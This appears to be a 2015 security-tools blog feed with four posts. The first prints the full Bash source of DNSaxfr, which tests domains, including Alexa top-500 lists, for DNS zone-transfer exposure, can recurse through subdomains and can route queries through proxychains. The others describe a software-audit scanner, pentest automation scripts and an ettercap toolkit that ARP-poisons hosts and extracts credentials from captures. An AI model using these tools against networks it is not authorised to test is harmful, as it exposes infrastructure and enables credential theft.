September 1, 2015, 11:22 am
$
0
0

Latest Change 1/9/2015:
BIG update: added -r and -p options and more..
+ Now this script is able to recursively tests every subdomain of a vulnerable domain, drawing all in a customizable tree (-r option).
+ Proxychains’ output now can be discarded using the -q option.
+ If a domain is vulnerable “VULNERABLE” is colored in green and “NOT VULNERABLE” in red.

DNSaxfr is a Shell script for testing DNS AXFR vulnerability.
Usage and Options:

Example Using DNSaxfr

Example Using DNSaxfr

Options:

-c COUNTRY_CODE Test Alexa top 500 sites by country
-h              Display the help and exit
-i              Interactive mode
-p              Use proxychains to safely query name servers
-q              Quiet mode when using proxychains (all proxychains' output is discarded)                     
-r              Test recursively every subdomain of a vulnerable domain, drawing all in a customizable tree
-z              Save the zone transfer in the wd in this form: domain_axfr.log

Tested Environments : All GNU/Linux.
DSNaxfr Script:

#!/bin/bash

########
#LICENSE                                                   
########

# DNS axfr vulnerability testing script. Please visit the project's website at: https://github.com/cybernova/DNSaxfr
# Copyright (C) 2015 Andrea 'cybernova' Dari (andreadari91@gmail.com)                                   
#                                                                                                       
# This shell script is free software: you can redistribute it and/or modify                             
# it under the terms of the GNU General Public License as published by                                   
# the Free Software Foundation, either version 2 of the License, or                                     
# any later version.                                                                   
#                                                                                                       
# This program is distributed in the hope that it will be useful,                                       
# but WITHOUT ANY WARRANTY; without even the implied warranty of                                        
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the                                         
# GNU General Public License for more details.                                                          
#                                                                                                       
# You should have received a copy of the GNU General Public License                                     
# along with this shell script.  If not, see <http://www.gnu.org/licenses/>.

filter()
{
	#Only the characters found in $IFS are recognized as word delimiters.
	while read DOMAIN
	do
		DOMAIN="$(echo $DOMAIN | tr '[:upper:]' '[:lower:]')"
		DOMAINLVL=$(echo $DOMAIN | sed -e 's/\.$//' | awk -F . '{ print NF }')
		digSite $DOMAIN
	done
}

alexaTop500()
{
	for VAL in $(seq 0 19)
	do
		for DOMAIN in $(wget -qO- "http://www.alexa.com/topsites/countries;${VAL}/$1" | cat - | grep site-listing | cut -d ">" -f 7 | cut -d "<" -f 1 | tr '[:upper:]' '[:lower:]')
		do
			DOMAINLVL=$(echo $DOMAIN | sed -e 's/\.$//' | awk -F . '{ print NF }')
			digSite $DOMAIN
		done
	done
}

usage()
{
	echo "Usage: DNSaxfr.sh [OPTION...][DOMAIN...]"
	echo -e  "Shell script for testing DNS AXFR vulnerability\n"
	echo "0 ARGUMENTS:"
	echo "The script acts like a filter, reads from stdin and writes on stdout, useful for using it in a pipeline."
	echo "NOTE: It takes one domain to test per line"
	echo "1+ ARGUMENTS:"
	echo "The script tests every domain specified as argument, writing the output on stdout."
	echo "OPTIONS:"
	echo "-c COUNTRY_CODE Test Alexa top 500 sites by country"
	echo "-h              Display the help and exit"
	echo "-i              Interactive mode"
	echo "-p              Use proxychains to safely query name servers"
	echo "-q              Quiet mode when using proxychains (all proxychains' output is discarded)"
	echo "-r              Test recursively every subdomain of a vulnerable domain"
	echo "-z              Save the zone transfer in the wd in the following form: domain_axfr.log" 
}

iMode()
{
	echo -e "########\n#LICENSE\n########\n"
	echo "# DNS axfr vulnerability testing script. Please visit the project's website at: https://github.com/cybernova/DNSaxfr"
	echo "# Copyright (C) 2015 Andrea 'cybernova' Dari (andreadari91@gmail.com)"
	echo "#"
	echo "# This shell script is free software: you can redistribute it and/or modify"
	echo "# it under the terms of the GNU General Public License as published by"
	echo "# the Free Software Foundation, either version 3 of the License, or"
	echo "# any later version."
	echo "#"
	echo "# This program is distributed in the hope that it will be useful,"
	echo "# but WITHOUT ANY WARRANTY; without even the implied warranty of"
	echo "# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the"
	echo "# GNU General Public License for more details."
	echo -e "\n\n"
	echo "Insert the domain you want to test (Ctrl+d to terminate):"
	while read DOMAIN
	do
		DOMAIN="$(echo $DOMAIN | tr '[:upper:]' '[:lower:]')"
		DOMAINLVL=$(echo $DOMAIN | sed -e 's/\.$//' | awk -F . '{ print NF }')
		digSite $DOMAIN
		echo "Insert the domain you want to test (Ctrl+d to terminate):"
	done
}

drawTree()
{
	unset TREE1 TREE2
	TREE1="|--"
	TREE2="|  "
	if [ "$DOMAIN" = "$1" ]
	then
		[ -n "$VULNERABLE" ] && printf "DOMAIN $1:$VULNERABLE ${GREEN}VULNERABLE!${RCOLOR}\n"
		[ -n "$NOT_VULNERABLE" ] && printf "DOMAIN $1:$NOT_VULNERABLE ${RED}NOT VULNERABLE!${RCOLOR}\n"
		return 
 	fi
	LVLDIFF=$(( $(echo $1 | sed -e 's/\.$//' | awk -F . '{ print NF }') - $DOMAINLVL))
	if [ $LVLDIFF -eq 1 ]
	then
		[ -n "$VULNERABLE" ] && printf "${TREE1}DOMAIN $1:$VULNERABLE ${GREEN}VULNERABLE!${RCOLOR}\n"
		if [ ! -n "$VULNERABLE" ]
		then
			printf "${TREE1}DOMAIN $1:$NOT_VULNERABLE ${RED}NOT VULNERABLE!${RCOLOR}\n"
		else
			[ -n "$NOT_VULNERABLE" ] && printf "${TREE2}DOMAIN $1:$NOT_VULNERABLE ${RED}NOT VULNERABLE!${RCOLOR}\n"
		fi
	else
		for i in $(seq 1 $LVLDIFF)
		do
			TREE1=" $TREE1"
			TREE2=" $TREE2"
		done
		[ -n "$VULNERABLE" ] && printf "|${TREE1}DOMAIN $1:$VULNERABLE ${GREEN}VULNERABLE!${RCOLOR}\n"
		if [ ! -n "$VULNERABLE" ]
		then
			printf "|${TREE1}DOMAIN $1:$NOT_VULNERABLE ${RED}NOT VULNERABLE!${RCOLOR}\n"
		else
			[ -n "$NOT_VULNERABLE" ] && printf "|${TREE2}DOMAIN $1:$NOT_VULNERABLE ${RED}NOT VULNERABLE!${RCOLOR}\n"
		fi
	fi
}

digSite()
{
	unset VULNERABLE NOT_VULNERABLE
	#$1 domain to test
	FILE="${DOMAIN}_axfr.log"
	NS="$($QUIET1 $PROXY dig $1 ns $QUIET2 | egrep "^$1" | awk '{ print $5 }')"
	for NSERVER in $(echo $NS)
	do
		if [ "$ZONETRAN"  = 'enabled' -a ! -f $FILE ]
		then
			if $QUIET1 $PROXY dig @$NSERVER $1 axfr $QUIET2 | tee /tmp/$FILE | egrep '[[:space:]]NS[[:space:]]' > /dev/null 2>&1
			then
				mv /tmp/$FILE .
				VULNERABLE="$VULNERABLE $NSERVER"
			else
				rm /tmp/$FILE
				NOT_VULNERABLE="$NOT_VULNERABLE $NSERVER"
			fi
		else
			if $QUIET1 $PROXY dig @$NSERVER $1 axfr $QUIET2 | egrep '[[:space:]]NS[[:space:]]' > /dev/null 2>&1
			then
				VULNERABLE="$VULNERABLE $NSERVER"
			else
				NOT_VULNERABLE="$NOT_VULNERABLE $NSERVER"
			fi
		fi
	done
	[ -n "$VULNERABLE" -o -n "$NOT_VULNERABLE" ] && drawTree $1
	if [ "$RECURSIVE" = 'enabled' -a -n "$VULNERABLE" ]
	then
		if [ -f $FILE ]
		then
			for SDOMAIN in $(egrep '[[:space:]]NS[[:space:]]' $FILE | egrep -vi "^$1" | awk '{ print $1 }' | sort -u)
			do
				digSite $SDOMAIN
			done
		else
			for SDOMAIN in $($QUIET1 $PROXY dig @$(echo $VULNERABLE | awk '{ print $1 }') $1 axfr $QUIET2 | egrep '[[:space:]]NS[[:space:]]' | egrep -vi "^$1" | awk '{ print $1 }' | sort -u)	
			do
				digSite $SDOMAIN
			done
		fi
	fi
}

parse()
{
	while getopts ':c:hipqrz' OPTION
	do
		case $OPTION in
		c)ALEXA500='enabled'; COUNTRY="$OPTARG";;
		h)usage && exit 0;;
		i)IMODE='enabled';;
		p)[ ! -x $(which proxychains) ] && echo "Proxychains is not installed...exiting" && exit 3 || PROXY='proxychains';;
		q)QUIET1='eval'; QUIET2='2>/dev/null';;
		r)RECURSIVE='enabled';;
		z)ZONETRAN='enabled';;
		\?)
			echo "Option not reconized...exiting"
			exit 1;;
		:)  
			echo "Option -$OPTARG requires an argument"
			exit 2;;
		esac
	done	
	shift $(($OPTIND - 1))

	[ "$ALEXA500" = 'enabled' ] && alexaTop500 $COUNTRY && exit 0
	[ "$IMODE" = 'enabled' ] && iMode && exit 0

	#No arguments
	[ $# -eq 0 ] && filter && exit 0

	#Every site specified as argument is tested
	for CONT in $(seq 1 $#)
	do
	DOMAIN="$(echo ${!CONT} | tr '[:upper:]' '[:lower:]')"
	DOMAINLVL=$(echo $DOMAIN | sed -e 's/\.$//' | awk -F . '{ print NF }')
	digSite $DOMAIN
	done
}

#############
#SCRIPT START
#############
GREEN='\033[1;92m'
RED='\033[1;91m'
RCOLOR='\033[1;00m'

parse "$@"
exit 0

Source : https://github.com/cybernova

Bash Scanner – A fast way to scan your server for outdated software and potential exploits.

September 2, 2015, 4:53 am
$
0
0

Bash Scanner is a fast and reliable way to scan your server for outdated software and potential exploits.

Bash Scanner Usage

Bash Scanner Usage

Extended reports:
After an initial scan, you will be asked to create an account on the PatrolServer dashboard (which is totally optional, you are free to use the tool without an account). The benefit of creating a sustainable account is detailed reporting, together with documentation on how to secure your server.

Continuous scanning:
The script will ask you if it should set a cronjob, this simply means your server software will be in sync for daily scans. And you will be reported by email when your current software becomes outdated.

Download : bash-scanner.zip(21.5KB)  | Clone Url
Source : https://patrolserver.com/

Updates Discover ~ Custom bash scripts To automate various pentesting tasks.

September 9, 2015, 1:58 pm
$
0
0

Latest Change :
+ discover.sh; Moved Deprecated msfcli to msfconsole -x syntax, Other changes.
+ setup.sh; Goofile verification and install in Setup Script

Discover Updates

Discover Updates

For use with Kali Linux. Custom bash scripts used to automate various pentesting tasks.

Discover Console

Discover Console

Download, setup & usage
+ git clone git://github.com/leebaird/discover.git /opt/discover/
+ All scripts must be ran from this location.
+ cd /opt/discover/
+ ./setup.sh
+ ./discover.sh

S0urce : https://github.com/leebaird | Our Post Before in long time ago :-)

MITM_Toolkit is A toolkit for automating MITM attack management.

September 10, 2015, 12:32 pm
$
0
0

MITM_Toolkit is A toolkit for automating MITM attack management with ettercap. This is a collection of scripts to assist with MITM attacks.
Incremental Poison:
This shell script accepts 3 arguments. The interface you are using (eth1, eth2, etc…), the number of concurrent hosts you want to poison, and the name of a directory you want to output the packet captures to. When launched, it will open a separate gnome-terminal (so you have to do it in the desktop interface), and will start poisoning. To move to the next batch, just hit the ‘q’ button on that interface and it will gracefully shutdown, re-ARP the hosts (to prevent disruption), and then launch the next set. While this is happening, everything is being dumped into an organized collection of log files. Currently the script assumes the gateway is on your /24 network (so should work out of the box 90% of the time). Will be updating to support more unusual cases as well.

Interface Incremental Poison

Interface Incremental Poison

Pcap Parser:
This shell script accepts 1 argument. The argument describes the path to the output directory from Incremental Poison, which contains all of the pcap files from a poisoning attack. It passes these pcaps through Ettercap -r and PCredz to extract credentials from the captured traffic.

Pcap-Parser

Pcap-Parser

Download : Mitm_Toolkit (62,9 KB)
Source : https://github.com/pan0pt1c0n

Viewing all 120 articles
Browse latest View live
Search